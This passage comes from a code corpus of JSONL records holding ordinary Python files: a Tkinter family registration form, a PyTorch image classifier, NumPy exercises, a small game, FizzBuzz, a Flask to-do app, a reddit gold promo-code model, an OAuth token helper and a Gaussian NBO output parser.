Already Registered\").grid(row=5, column=0, columnspan=3)\r\n return\r\n try:\r\n int(self.famNum.get())\r\n except ValueError:\r\n return\r\n self.family_file = open(self.famName.get(), \"w+\")\r\n self.family_file.write(self.famName.get() + '\\n')\r\n families_file = open(\"families\", \"a+\")\r\n families_file.write(self.famName.get() + '\\n')\r\n families_file.close()\r\n\r\n self.nameFrame = tk.Frame(self.master)\r\n self.nameFrame.grid(row=1, column=0)\r\n self.nameFrame.grid_rowconfigure([0, 1], minsize=40)\r\n self.nameFrame.grid_columnconfigure([0, 1, 2], minsize=65)\r\n\r\n self.i = 1\r\n\r\n self.personLbl = tk.Label(self.nameFrame, text=f\"Person #{self.i}\").grid(row=0, column=0)\r\n self.personName = tk.StringVar()\r\n self.personNtr = tk.Entry(self.nameFrame, textvariable=self.personName)\r\n self.personNtr.grid(row=0, column=1)\r\n\r\n if int(self.famNum.get()) == 1:\r\n self.ctnuBtn = tk.Button(self.nameFrame, text=\"Continue\", command=self.__continue_reg).grid(row=1, column=1)\r\n else:\r\n self.nxtPersonBtn = tk.Button(self.nameFrame, text=\"Next\", command=self.__next_person).grid(row=1, column=1)\r\n\r\n def __next_person(self):\r\n if self.i == int(self.famNum.get())-1:\r\n self.ctnuBtn = tk.Button(self.nameFrame, text=\"Continue\", command=self.__continue_reg).grid(row=1, column=1)\r\n if self.i < int(self.famNum.get()):\r\n self.family_file.write(self.personName.get() + '\\n')\r\n self.i += 1\r\n self.personLbl = tk.Label(self.nameFrame, text=f\"Person #{self.i}\").grid(row=0, column=0)\r\n self.personNtr.delete(0, 'end')\r\n\r\n def __continue_reg(self):\r\n self.family_file.write(self.personName.get() + '\\n')\r\n self.family_file.close()\r\n\r\n self.newFrame = tk.Frame(self.master)\r\n self.nameFrame.destroy()\r\n self.frame.destroy()\r\n IndividualPerson(self.master, self.newFrame, int(self.famNum.get()), self.famName)\r\n\r\n\r\nclass IndividualPerson:\r\n def __init__(self, master, frame, num, name):\r\n self.frame = frame\r\n self.master = master\r\n self.master.geometry('505x710')\r\n center(self.master)\r\n self.famNum = num\r\n self.famName = name\r\n\r\n self.frame.grid(row=0, column=0)\r\n self.frame.grid_rowconfigure([0, 1, 2, 3, 4, 5], minsize=40)\r\n self.frame.grid_columnconfigure([0, 1, 2, 3, 4], minsize=65)\r\n\r\n with open(self.famName.get(), \"r\") as self.fam_file:\r\n self.fam_data = self.fam_file.readlines()\r\n self.__each_person_info(1)\r\n\r\n def __each_person_info(self, i):\r\n self.i = i\r\n self.personLbl = tk.Label(self.frame, text=f\"{self.fam_data[self.i][:-1]}'s Personal Information\")\r\n self.personLbl.grid(row=0, column=0, sticky=\"we\", columnspan=5)\r\n self.portionLbl = tk.Label(self.frame, text=\"Select Portion Size:\").grid(row=1, column=0)\r\n self.portionViewBtn = tk.Button(self.frame, text=\"View Portion\", command=self.__portion_graph).grid(row=2, column=0)\r\n self.portionSld = tk.Scale(self.frame, tickinterval=25, showvalue=0, orient=tk.HORIZONTAL)\r\n self.portionSld.grid(row=1, column=1, columnspan=4, stick=\"we\")\r\n self.portionsLbl = tk.Label(self.frame, text=\"petite\\t\\tNormal\\t\\tBig Boi\\t\\tULTRA\").grid(row=2, column=1, sticky=\"we\", columnspan=4)\r\n self.portionGraph = tk.Canvas(self.frame, bg=\"darkgoldenrod3\", height=500, width=500)\r\n self.portionGraph.grid(row=3, column=0, columnspan=5, sticky=\"we\")\r\n self.portionPlate = self.portionGraph.create_oval(10, 490, 490, 10, fill=\"lemon chiffon\")\r\n\r\n self.allergyLbl = tk.Label(self.frame, text=\"Allergies: \").grid(row=4, column=0)\r\n 
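The portion-size UI in this record couples a tk.Scale to concentric Canvas ovals, but only redraws when the "View Portion" button fires. A minimal standalone sketch of driving the Canvas directly from the Scale's command callback instead; widget names here are illustrative:

# Minimal sketch: redraw a Canvas oval whose size tracks a tk.Scale value.
import tkinter as tk

root = tk.Tk()
canvas = tk.Canvas(root, width=200, height=200, bg="white")
canvas.pack()

def redraw(value):
    r = 20 + int(value)               # radius tracks the slider (Scale passes a string)
    canvas.delete("portion")          # remove the previous oval by tag
    canvas.create_oval(100 - r, 100 - r, 100 + r, 100 + r,
                       fill="salmon1", tags="portion")

scale = tk.Scale(root, from_=0, to=75, orient=tk.HORIZONTAL, command=redraw)
scale.pack()
redraw(0)
root.mainloop()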
self.allergyVar = tk.StringVar()\r\n self.allergyNtr = tk.Entry(self.frame, textvariable=self.allergyVar)\r\n self.allergyNtr.grid(row=4, column=1)\r\n self.allergyLbl2 = tk.Label(self.frame, text=\"(if many separate w/ ',')\").grid(row=4, column=2)\r\n\r\n self.nextBtn = tk.Button(self.frame, text=\"Next\", command=partial(self.__next_person_info, self.i)).grid(row=5, column=4)\r\n if self.famNum == 1:\r\n self.finishBtn = tk.Button(self.frame, text=\"Finish\", command=partial(self.__add_personal, self.i)).grid(row=5, column=4)\r\n\r\n def __portion_graph(self):\r\n self.portionDepiction = self.portionGraph.create_oval(10, 490, 490, 10, fill=\"lemon chiffon\")\r\n if 0 <= self.portionSld.get() < 25:\r\n self.portionDepiction = self.portionGraph.create_oval(200, 300, 300, 200, fill=\"salmon1\")\r\n elif 25 <= self.portionSld.get() < 50:\r\n self.portionDepiction = self.portionGraph.create_oval(150, 350, 350, 150, fill=\"salmon1\")\r\n elif 50 <= self.portionSld.get() < 75:\r\n self.portionDepiction = self.portionGraph.create_oval(100, 400, 400, 100, fill=\"salmon1\")\r\n elif 75 <= self.portionSld.get() < 100:\r\n self.portionDepiction = self.portionGraph.create_oval(50, 450, 450, 50, fill=\"salmon1\")\r\n\r\n def __next_person_info(self, i):\r\n self.i = i\r\n self.__add_personal(self.i)\r\n self.i += 1\r\n if self.i == self.famNum:\r\n self.__each_person_info(self.i)\r\n self.finishBtn = tk.Button(self.frame, text=\"Finish\", command=partial(self.__add_personal, self.i)).grid(row=5, column=4)\r\n else:\r\n self.__each_person_info(self.i)\r\n\r\n def __add_personal(self, i):\r\n if 0 <= self.portionSld.get() < 25:\r\n self.portionSize = 1\r\n elif 25 <= self.portionSld.get() < 50:\r\n self.portionSize = 2\r\n elif 50 <= self.portionSld.get() < 75:\r\n self.portionSize = 3\r\n elif 75 <= self.portionSld.get() < 100:\r\n self.portionSize = 4\r\n\r\n self.fam_data[i] = self.fam_data[i][:-1] + f\"; {self.portionSize}; {self.allergyVar.get()}\" + \"\\n\"\r\n self.family_file = open(self.famName.get(), \"w+\")\r\n\r\n if self.i == self.famNum:\r\n self.family_file.writelines(self.fam_data + ['|\\n'])\r\n self.family_file.close()\r\n self.frame.destroy()\r\n family.ChoseFamily(self.master)\r\n\r\n","sub_path":"reg_family.py","file_name":"reg_family.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"481745980","text":"import os \nfrom glob import glob \nimport numpy as np \nfrom PIL import Image \nimport torch, torchvision \nimport torch.nn as nn \nfrom torchvision import transforms \nfrom torchvision.models import vgg19 \nfrom torch.utils.data import DataLoader \nfrom sklearn.metrics import classification_report\nfrom torch.utils.tensorboard import summary \nimport matplotlib.pyplot as plt\nimport json \nfrom tqdm import tqdm \nimport argparse\n\nfrom networks.vgg import Classifier\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\ntorch.manual_seed(0)\nnp.random.seed(0)\n\nclass Transform():\n def __init__(self, resize, mean, std):\n self.data_transform = {\n \"train\": transforms.Compose([\n transforms.RandomResizedCrop(resize, scale=(.5, 1.0)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ]), \n \"val\": transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n }\n\n def __call__(self, phase, img):\n return self.data_transform[phase](img)\n \n \ndef load_model(labels):\n RESIZE = 224 \n MEAN = (.485, 
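The Transform wrapper at the top of the predict.py record keys a train/val pair of torchvision Compose pipelines by phase name; note that the record's "val" pipeline omits any resize, which is likely why its callers must supply already-sized images. A minimal usage sketch, assuming torchvision is installed; the added Resize in the val branch is an assumption, not part of the record:

# Phase-keyed transform dict, as in the Transform class above.
from PIL import Image
from torchvision import transforms

MEAN, STD = (.485, .456, .406), (.229, .224, .225)
pipelines = {
    "train": transforms.Compose([
        transforms.RandomResizedCrop(224, scale=(.5, 1.0)),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize(MEAN, STD),
    ]),
    "val": transforms.Compose([
        transforms.Resize((224, 224)),   # added here; the record's val branch has no resize
        transforms.ToTensor(),
        transforms.Normalize(MEAN, STD),
    ]),
}

img = Image.new("RGB", (640, 480))
tensor = pipelines["val"](img)
print(tensor.shape)   # torch.Size([3, 224, 224])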
.456, .406)\n STD = (.229, .224, .225)\n net = Classifier(len(labels))\n # gitリポジトリにサイズ関係で置けないので別途用意すること\n net.load_state_dict(torch.load(\"./weights/classifier4.pth\", map_location={\"cuda:0\": \"cpu\"}))\n net.eval()\n net.to(device)\n transform = Transform(RESIZE, MEAN, STD)\n return net, transform \n\ndef load_label():\n with open(\"labels.json\", \"r\") as f:\n label2index = json.load(f)\n f.close()\n index2label = {v: k for k, v in label2index.items()}\n return index2label \n\ndef show_img(img):\n plt.imshow(img.resize((1080, 1080)))\n plt.xticks([])\n plt.yticks([])\n plt.show()\n\ndef main(img_path: str):\n # モデルの読み込み\n index2label = load_label()\n net, transform = load_model(index2label)\n # 画像の前処理\n img = Image.open(img_path)\n show_img(img)\n img_tensor = transform(\"val\", img).unsqueeze(0).to(device)\n # 推論\n with torch.no_grad():\n output = net(img_tensor)\n output = nn.Softmax(dim=1)(output)\n pred = output.topk(3)[0][0].detach().cpu().numpy().tolist() # 確率\n pred_id = output.topk(3)[1][0].detach().cpu().numpy().tolist() # index \n # ラベル名と確率\n results = {}\n for i, (p, idx) in enumerate(zip(pred, pred_id)):\n pred_name = index2label[int(idx)]\n result = {}\n result[\"score\"] = p \n result[\"predict\"] = pred_name \n results[str(i+1)] = result\n return results \n\nparser.add_argument(\"--image\", help=\"image path name\", type=str, default=\"1.jpg\")\nargs = parser.parse_args()\nimage = str(args.image)\nimg_p = os.path.join(\"img\", image)\nmain(img_p)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"626300961","text":"# --------------\n# Importing header files\r\nimport numpy as np\r\n\r\n# Path of the file has been stored in variable called 'path'\r\ndata = np.genfromtxt(path,delimiter=\",\",skip_header = 1)\r\n#New record\r\nnew_record=[[50, 9, 4, 1, 0, 0, 40, 0]]\r\n\r\ncensus = np.concatenate((data,new_record))\r\n\r\n#Code starts here\r\n\n\n\n# --------------\n#Code starts here\r\n# Create a new array called 'age' by taking only age column(age is the column with index 0) of 'census' array.\r\nage = census[:,0]\r\n\r\n# Find the max age and store it in a variable called 'max_age'.\r\nmax_age = np.max(age)\r\n\r\n# Find the min age and store it in a variable called 'min_age'.\r\nmin_age = np.min(age)\r\n\r\n# Find the mean of the age and store it in variable called 'age_mean'.\r\nage_mean = np.mean(age)\r\n\r\n# Find the standard deviation of the age and store it in a variable called 'age_std'.\r\nage_std = np.std(age)\r\n\r\n# print(max_age,min_age,age_mean,age_std)\r\n\n\n\n# --------------\n#Code starts here\r\n\r\n\r\n# race 0\r\n# len(census[:,2])\r\n\r\nrace_0 = census[census[:,2]==0]\r\n\r\n# race 1\r\nrace_1 = census[census[:,2] == 1]\r\n\r\n# race 2\r\nrace_2 = census[census[:,2] == 2]\r\n\r\n# race 3\r\nrace_3 = census[census[:,2] == 3]\r\n\r\n# race 4\r\nrace_4 = census[census[:,2] == 4]\r\n\r\n# storing their lenghts\r\nlen_0 = len(race_0)\r\n\r\nlen_1 = len(race_1)\r\nlen_2 = len(race_2)\r\nlen_3 = len(race_3)\r\nlen_4 = len(race_4)\r\n\r\nminority_race = list(np.array([len_0,len_1,len_2,len_3,len_4])).index(np.min(np.array([len_0,len_1,len_2,len_3,len_4])))\r\n\r\n# print(minority_race)\n\n\n# --------------\n#Code starts here\r\n\r\n\r\n# Create a new subset array called 'senior_citizens' by filtering 'census' according to age>60 (age is the column with index 0)\r\nsenior_citizens = census[ census[:,0] > 60 
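Two things worth flagging in the predict.py record above: output.topk(3) returns a (values, indices) pair, which the code indexes as [0]/[1], and the module-level parser.add_argument(...) call runs before any parser is created, so the script as stored would raise NameError. A hedged sketch of the presumably intended CLI tail, with the missing ArgumentParser construction added:

# Presumed-intended tail of predict.py: the record omits constructing the
# parser before calling parser.add_argument.
import argparse
import os

parser = argparse.ArgumentParser()      # assumed missing line
parser.add_argument("--image", help="image path name", type=str, default="1.jpg")
args = parser.parse_args()
img_p = os.path.join("img", str(args.image))
# main(img_p) would then run inference exactly as defined in the record.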
]\r\n\r\n# Add all the working hours(working hours is the column with index 6) of 'senior_citizens' and \r\n# store it in a variable called 'working_hours_sum'\r\n\r\nworking_hours_sum = np.sum(senior_citizens[:,6])\r\n\r\n# Find the length of 'senior_citizens' and store it in a variable called 'senior_citizens_len'\r\nsenior_citizens_len = len(senior_citizens)\r\n\r\n# result\r\navg_working_hours = working_hours_sum/senior_citizens_len\r\n\r\nprint(avg_working_hours)\n\n\n# --------------\n#Code starts here\r\n\r\n\r\nhigh,low = census[census[:,1] > 10],census[census[:,1] <= 10]\r\n\r\n# Find the mean of income column(income is the column with index 7) of 'high' array and store it in 'avg_pay_high'. \r\n# Do the same for 'low' array and store it's mean in 'avg_pay_low'.\r\n\r\navg_pay_high,avg_pay_low = np.mean(high[:,7]),np.mean(low[:,7])\r\n\r\nprint(avg_pay_high - avg_pay_low)\n\n\n","sub_path":"numpy_project/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"13925659","text":"import risar\r\nfrom random import randint, uniform\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\n\r\nclass krogec:\r\n def __init__(self):\r\n self.premer = 10\r\n self.x = randint(self.premer, risar.maxX - self.premer)\r\n self.y = randint(self.premer, risar.maxY - self.premer)\r\n self.ky = 1\r\n self.kx = 1\r\n self.px = randint(-5, 5)\r\n self.py = randint(-5, 5)\r\n self.hitrost = uniform(0.000001, 0.000009)\r\n self.barva = risar.nakljucna_barva()\r\n self.lik = risar.krog(self.x, self.y, self.premer, self.barva, 2)\r\n self.pocen = False\r\n self.timer = 500\r\n\r\n def premikanje(self):\r\n if not self.pocen and self.timer > 2:\r\n self.lik.setPos(self.x, self.y)\r\n if self.y + self.premer >= risar.maxY or self.y - self.premer <= 0:\r\n self.ky *= -1\r\n if self.x + self.premer >= risar.maxX or self.x - self.premer <= 0:\r\n self.kx *= -1\r\n self.x += self.px * self.kx\r\n self.y += self.py * self.ky\r\n\r\n def konec(self):\r\n self.risar.stoj()\r\n\r\n def pok(self, x, y):\r\n if not self.pocen:\r\n if abs(self.x - x) < 30 and abs(self.y - y) < 30 or \\\r\n any([True if abs(self.x - i[0]) < 30 and abs(self.y - i[1]) < 30 else False for i in pocene_s]):\r\n risar.odstrani(self.lik)\r\n self.lik = risar.krog(self.x, self.y, 30, self.barva, 2)\r\n c = self.lik.pen().color().lighter()\r\n c.setAlpha(192)\r\n self.lik.setBrush(c)\r\n self.pocen = True\r\n pocene_s.append((self.x, self.y))\r\n if self.pocen:\r\n if self.timer != 0:\r\n self.timer -= 1\r\n else:\r\n if pocene_s:\r\n pocene_s.pop(0)\r\n m.max()\r\n risar.odstrani(self.lik)\r\n risar.odstrani(self.lik)\r\n self.timer = -10\r\n\r\n\r\nclass mis:\r\n def __init__(self):\r\n self.x, self.y = risar.miska\r\n self.da = True\r\n self.merek = risar.krog(self.x, self.y, 30)\r\n self.timer = 3000\r\n self.konec = False\r\n self.maksimalni = 0\r\n\r\n def premik(self):\r\n if self.da:\r\n self.x, self.y = risar.miska\r\n self.merek.setPos(self.x, self.y)\r\n if risar.klik:\r\n risar.odstrani(self.merek)\r\n self.pocen = risar.krog(self.x, self.y, 30)\r\n self.da = False\r\n if risar.klik and not self.da:\r\n if self.timer != 0:\r\n self.timer -= 1\r\n return self.x, self.y\r\n else:\r\n risar.odstrani(self.pocen)\r\n self.konec = True\r\n return -300, -300\r\n else:\r\n return -300, -300\r\n\r\n def koncano(self):\r\n if self.konec and not pocene_s:\r\n self.izpis()\r\n self.konec = False\r\n self.zakljuci()\r\n\r\n def 
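The census snippet above leans entirely on NumPy boolean masking (census[census[:, 2] == 0], census[census[:, 0] > 60]). A tiny self-contained illustration of that idiom with made-up data:

# Boolean row masking, the idiom used throughout the census snippet.
import numpy as np

data = np.array([[25, 1], [70, 0], [63, 1]])   # columns: age, flag

mask = data[:, 0] > 60         # elementwise comparison -> boolean vector
seniors = data[mask]           # keep only rows where the mask is True
print(seniors)                 # [[70  0] [63  1]]
print(seniors[:, 0].mean())    # 66.5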
max(self):\r\n self.maksimalni += 1\r\n\r\n def zakljuci(self):\r\n risar.stoj()\r\n\r\n def izpis(self):\r\n if self.konec:\r\n QMessageBox.information(None, \"RAZTRELJENIH\", \"RAZTRELJENO \\n{pocenih}/{vse}\".format(pocenih=self.maksimalni,vse=stevilo))\r\n self.konec=False\r\n\r\nglobal pocene_s\r\npocene_s = []\r\nkrogi = []\r\nstevilo = 5\r\nm = mis()\r\n\r\nfor x in range(stevilo):\r\n k = krogec()\r\n krogi.append(k)\r\n\r\nwhile 1:\r\n for x in range(stevilo):\r\n krogi[x].premikanje()\r\n q, w = m.premik()\r\n krogi[x].pok(q, w)\r\n m.koncano()\r\n risar.cakaj(0.01)\r\n","sub_path":"code/batch-2/vse-naloge-brez-testov/DN14-M-174.py","file_name":"DN14-M-174.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"71675135","text":"\"\"\"\nWrite a program that outputs the string representation of numbers from 1 to n.\n\nBut for multiples of three it should output “Fizz” instead of the number and for the\nmultiples of five output “Buzz”. For numbers which are multiples of both three\nand five output “FizzBuzz”.\n\"\"\"\n\nclass Solution(object):\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n res = [x for x in range(1, n+1)]\n for i, val in enumerate(res):\n if val % 15 == 0:\n res[i] = \"FizzBuzz\"\n elif val % 3 == 0:\n res[i] = \"Fizz\"\n elif val % 5 == 0:\n res[i] = \"Buzz\"\n else:\n res[i] = str(val)\n\n return res\n\n def fizzBuzz2(self, n):\n return ['Fizz' * (not i % 3) + 'Buzz' * (not i % 5) or str(i) for i in range(1, n + 1)]\n\nn = 15\nprint(Solution().fizzBuzz2(n))","sub_path":"412FizzBuzz.py","file_name":"412FizzBuzz.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"261930487","text":"import sqlite3\r\nfrom flask import Flask, request, render_template\r\napp = Flask(__name__)\r\n\r\nconn = sqlite3.connect('database.db')\r\nconn.execute('CREATE TABLE IF NOT EXISTS todo (username TEXT, task TEXT, status INTEGER)')\r\nconn.close()\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef login():\r\n return render_template('login.html')\r\n\r\n@app.route('/register')\r\ndef displayRegister():\r\n\treturn render_template('register.html') \r\n\r\n@app.route('/todo', methods=['GET', 'POST'])\r\ndef toDo():\r\n\tusername = request.form['username']\r\n\treturn render_template('todo.html', username=username) \r\n\r\n@app.route('/add', methods=['POST'])\r\ndef add():\r\n\ttodo = request.form['task']\r\n\treturn render_template('todo.html')\r\n\r\n\r\n@app.route('/addtodo', methods = ['POST', 'GET'])\r\ndef addTODO():\r\n if request.method == 'POST':\r\n try:\r\n username = request.form['username']\r\n task = request.form['task']\r\n \r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n cur.execute(\"INSERT INTO todo (name, task, status) VALUES (?,?,?)\", (name, task, status))\r\n con.commit()\r\n\r\n except:\r\n con.rollback() \r\n\r\n finally:\r\n return render_template(\"result.html\")\r\n con.close()\r\n\r\n@app.route('/list')\r\ndef list():\r\n con = sql.connect(\"database.db\")\r\n con.row_factory = sql.Row\r\n \r\n cur = con.cursor()\r\n cur.execute(\"select * from todo\")\r\n \r\n rows = cur.fetchall(); \r\n return render_template(\"list.html\",rows = rows)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, 
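The Flask to-do record above carries three stored bugs worth flagging: it imports sqlite3 but calls sql.connect, addTODO inserts into columns (name, task, status) although the table was created with username, and the bound variables name/status are never defined, so the route would raise NameError. A hedged sketch of the presumably intended parameterized insert:

# Presumed-intended insert helper for the /addtodo route, matching the
# (username, task, status) schema created at startup.
import sqlite3

def add_todo(username, task, status=0, db="database.db"):
    # The connection context manager commits on success, rolls back on error.
    with sqlite3.connect(db) as con:
        con.execute(
            "INSERT INTO todo (username, task, status) VALUES (?, ?, ?)",
            (username, task, status),
        )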
host='0.0.0.0')","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316258121","text":"from datetime import datetime\nfrom pylons import g\nfrom sqlalchemy import func\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.schema import Column\nfrom sqlalchemy.sql import and_\nfrom sqlalchemy.types import DateTime, Integer, String\n\nfrom r2.models.gold import Base, Session\n\n\ndef with_sqlalchemy_session(f):\n \"\"\"Ensures sqlalchemy session is closed (due to connection pooling).\"\"\"\n def close_session_after(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n finally:\n Session.remove()\n\n return close_session_after\n\n\nclass GoldPartnerCodesExhaustedError(Exception):\n pass\n\n\nclass GoldPartnerDealCode(Base):\n \"\"\"Promo codes for deals from reddit gold partners.\"\"\"\n\n __tablename__ = \"reddit_gold_partner_deal_codes\"\n\n id = Column(Integer, primary_key=True)\n deal = Column(String, nullable=False)\n code = Column(String, nullable=False)\n user = Column(Integer, nullable=True)\n date = Column(DateTime(timezone=True), nullable=True)\n\n @classmethod\n @with_sqlalchemy_session\n def get_codes_for_user(cls, user):\n results = Session.query(cls).filter(cls.user == user._id)\n codes = {r.deal: r.code for r in results}\n return codes\n \n @classmethod\n @with_sqlalchemy_session\n def claim_code(cls, user, deal):\n # check if they already have a code for this deal and return it\n try:\n result = (Session.query(cls)\n .filter(and_(cls.user == user._id,\n cls.deal == deal))\n .one())\n return result.code\n except NoResultFound:\n pass\n\n # select an unclaimed code, assign it to the user, and return it\n try:\n claiming = (Session.query(cls)\n .filter(and_(cls.deal == deal,\n cls.user == None,\n func.pg_try_advisory_lock(cls.id)))\n .limit(1)\n .one())\n except NoResultFound:\n raise GoldPartnerCodesExhaustedError\n\n claiming.user = user._id\n claiming.date = datetime.now(g.tz)\n Session.add(claiming)\n Session.commit()\n\n # release the lock\n Session.query(func.pg_advisory_unlock_all()).all()\n\n return claiming.code \n","sub_path":"reddit_gold/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"56951208","text":"from oauthlib.oauth2 import MobileApplicationClient\nfrom requests_oauthlib import OAuth2Session\n\n\nclient_id = 'd0FVV29VMDR6SUVrcV94cTdabHBoZzoxZjc2MTE1Mzc1YjMxNzhi'\ntoken_url = \"https://a.mapillary.com/v2/oauth/token\"\nredirect_uri = \"https://geoclub.de/mapillary/oauth2.php\"\nauth_url = \"https://www.mapillary.com/connect\"\nscopes = ['public:upload']\n\nmobile = MobileApplicationClient(client_id)\noauth = OAuth2Session(client=mobile, redirect_uri=redirect_uri, scope=scopes)\nauthorization_url, state = oauth.authorization_url(url=auth_url)\nprint(\"State:\", state)\n\nprint( 'Please go to %s and authorize access.' 
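The with_sqlalchemy_session decorator above is the general try/finally cleanup shape: the wrapped call's result (or exception) passes through, and Session.remove() always runs. A generic runnable sketch of the same pattern; unlike the record's version it applies functools.wraps so the wrapped function keeps its name:

# Generic form of the cleanup decorator used for Session.remove() above.
import functools

def with_cleanup(cleanup):
    """Run cleanup() after the wrapped function, even if it raises."""
    def decorator(f):
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            try:
                return f(*args, **kwargs)
            finally:
                cleanup()
        return wrapper
    return decorator

@with_cleanup(lambda: print("cleaned up"))
def work():
    return "done"

print(work())   # prints "cleaned up", then "done"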
% authorization_url)\nauthorization_response = input('\\nEnter the resulting callback URL:\\n')\n\nf = open(\"accesstoken3.conf\", \"w\")\nfor line in authorization_response.split(\"&\"):\n if \"access_token\" in line:\n f.write(line.split(\"=\")[1])\nf.close()\nprint(\"Configfile with access token created.\")\n","sub_path":"python3/accesstoken3.py","file_name":"accesstoken3.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"146148297","text":"import random\n\nSIZE = 20\nMIN = 1\nMAX = 9\n\nint_list = [0] * SIZE\n\nfor i in range(SIZE):\n int_list[i] = random.randint(MIN,MAX)\n\nvalid = None\nwhile not valid:\n number = int(input(\"Please enter your lucky number (from \" + str(MIN) + \" to \" + str(MAX) + \": \"))\n if number <= MAX and number >= MIN:\n valid = True\n\noccurrences = []\n\nfor i in range(SIZE):\n if int_list[i] == number:\n occurrences.append(i)\n\nif len(occurrences) == 0:\n print(\"Sorry, you are not on the list.\")\nelse:\n print(\"We found your number on position\" + (\"s \" if len(occurrences) > 1 else \" \") + str(occurrences))\n","sub_path":"week 6/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"645129707","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 10 10:40:20 2021\r\n\r\n@author: illari and jonas\r\n\r\nThis script takes a set of Gaussian output files containing NBO data and extracts\r\ncalculated NBO occupancies and energies between labeled atoms in each Gaussian\r\nfile defined in 'Atomlabels'. The input files must be in the same working\r\ndirectory as this script.\r\n\r\nThe results are tabulated and recorded in an output Excel workbook ('NBO analysis.xlsx')\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport itertools as i\r\nimport glob\r\nimport re\r\n\r\n#READ ATOMLABELS AND LIST OF .LOG FILES\r\nstring1 = 'Please put all .log files in the same directory as this script' #creates a list of all .log files in current directory\r\nprint(string1) \r\nlistFileNames = [] \r\nfor filename in glob.glob(\"*.log\"):\r\n listFileNames.append(filename)\r\n\r\nstring2 = 'Please enter the name of the Atomlabels file without .xlsx:' #reads atomlabels excel sheet but has to be in same folder\r\npathAtomLables = input(string2) \r\ndfAtomLabels = pd.read_excel(str(pathAtomLables)+'.xlsx',index_col=0)\r\n \r\n#Generates the column names for the the output dataframe\r\nallvalenceorbitals = [] \r\nfor element in list(dfAtomLabels.head()): #adds LP(1) through LP(3) to the list list of atomnames given in Atomlabels.\r\n allvalenceorbitals.append(element + ' LP(1)')\r\n allvalenceorbitals.append(element + ' LP(2)')\r\n allvalenceorbitals.append(element + ' LP(3)')\r\nbondcombinationswithoutdash = list(i.combinations(list(dfAtomLabels.head()), 2)) #returns all possible 2-atom combinations and casts it to a list of str\r\nbondcombination = [' - '.join(i) for i in bondcombinationswithoutdash] \r\nfor element in bondcombination: \r\n allvalenceorbitals.append(element + ' BD(1)') #gnerated bonding and antibonding orbitals for all bonds.\r\n allvalenceorbitals.append(element + ' BD(2)')\r\n allvalenceorbitals.append(element + ' BD(3)')\r\n allvalenceorbitals.append(element + ' BD*(1)')\r\n allvalenceorbitals.append(element + ' BD*(2)')\r\n allvalenceorbitals.append(element + ' BD*(3)')\r\nallNBOtitle = []\r\nfor element in 
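The lucky-number snippet above collects matching indices with an explicit range loop; the same scan reads more idiomatically with enumerate inside a comprehension:

# enumerate/comprehension form of the occurrence scan above.
import random

int_list = [random.randint(1, 9) for _ in range(20)]
number = 7
occurrences = [i for i, v in enumerate(int_list) if v == number]
print(occurrences if occurrences else "Sorry, you are not on the list.")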
allvalenceorbitals:\r\n allNBOtitle.append(element + ' occ')\r\n allNBOtitle.append(element + ' Energy')\r\n\r\n#GET DATA OF .LOG FILES\r\ndef get_logfiles(files):\r\n logfile=[]\r\n with open(str(listFileNames[files]),'r') as f: #reads the .log file in reading only mode\r\n flag = False #orbitals and total lewis\r\n for line in f:\r\n if line.startswith(' Total Lewis'): #iterates through all the files, name by name and only reads data between natural bond\r\n flag=False \r\n if flag:\r\n logfile.append(line)\r\n if line.startswith(' Natural Bond Orbitals (Summary):'):\r\n flag=True\r\n return(logfile)\r\n\r\n#NBO analysis\r\n \r\nallNBOforallfiles = [] \r\nfor files in range(len(listFileNames)): #iterates through all the .log files\r\n NBOsummary= get_logfiles(files) #returns the NBO summary of the .log file as a list of str \r\n# NBO analysis list \r\n allNBO=[]\r\n#NBOs are extracted by searching the NBO Summary with a regular expressions re \r\n#Extraction of the LP. This sequence returns a list of list. The sublists are empty if the str is not found, sublist contains the whole line if a str is re.match for the line. \r\n LP_occ_energy = []\r\n LPatoms = list(dfAtomLabels.iloc[files])\r\n#re.match also matches empty spaces to account for integer with more than one digit all atom lables are filled to have 4 characters: 1 becomes ' 1'\r\n for m in range(len(LPatoms)):\r\n LPatoms[m]= str(LPatoms[m])\r\n LPatoms[m]= LPatoms[m].rjust(4)\r\n#searches for the appropriate LP withe by iterating through all atoms in the atom labele\r\n for m in range(len(list(dfAtomLabels.iloc[files]))):\r\n \r\n r1 = re.compile(\".*LP 